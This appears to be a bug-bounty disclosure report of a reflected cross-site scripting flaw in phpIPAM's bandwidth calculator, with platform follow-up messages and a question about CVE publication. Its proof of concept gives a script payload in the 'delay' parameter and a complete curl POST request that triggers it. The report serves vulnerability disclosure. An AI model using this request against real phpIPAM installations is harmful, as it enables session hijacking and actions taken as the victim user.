Cross Site Scripting (XSS) Reflected in phpipam/phpipam
Valid
Reported on
Nov 1st 2022
Description
Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.
Proof of Concept
1. i open this page localhost/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator
2. and i analysis code line 41-45 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/bw-calculator-result.php
3. next i tried with burpsuite to intercept and then change the value of some parameters such as wsize, delay and fsize on line 13-15 https://github.com/phpipam/phpipam/blob/master/app/tools/ip-calculator/ bw-calculator-result.php with <script>alert(1)</script> payload
4. and i trigger payload xss reflected <script>alert(1)</script>
//PoC
curl -i -s -k -X $'POST' \
-H $'Host: 192.168.1.15' -H $'Content-Length: 54' -H $'Accept: */*' -H $'X-Requested-With: XMLHttpRequest' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Origin: http://192.168.1.15' -H $'Referer: http://192.168.1.15/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,id;q=0.8' -H $'Connection: close' \
-b $'sectionSubnets.bs.table.searchText=; table-page-size=50; phpipam=p4jub8nb4ou2a95kso4ed22aom' \
--data-binary $'wsize=50000&delay=<script>alert(1)</script>&fsize=1024' \
$'http://192.168.1.15/phpipam/app/tools/ip-calculator/bw-calculator-result.php'
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:
- Perform any action within the application that the user can perform.
- View any information that the user is able to view.
- Modify any information that the user is able to modify.
- Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.
References
We are processing your report and will contact the
phpipam
team within 24 hours.
6 months ago
ZenalArifin modified the report
6 months ago
ZenalArifin modified the report
6 months ago
We have contacted a member of the
phpipam
team and are waiting to hear back
6 months ago
We have sent a
follow up to the
phpipam
team.
We will try again in 7 days.
6 months ago
We have sent a
second
follow up to the
phpipam
team.
We will try again in 10 days.
6 months ago
We have sent a
third and final
follow up to the
phpipam
team.
This report is now considered stale.
6 months ago
Thanks for reporting
ZenalArifin
has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Hello. The CVE for this Vulnerability hast Not Bern published. When will you publish IT ?
to join this conversation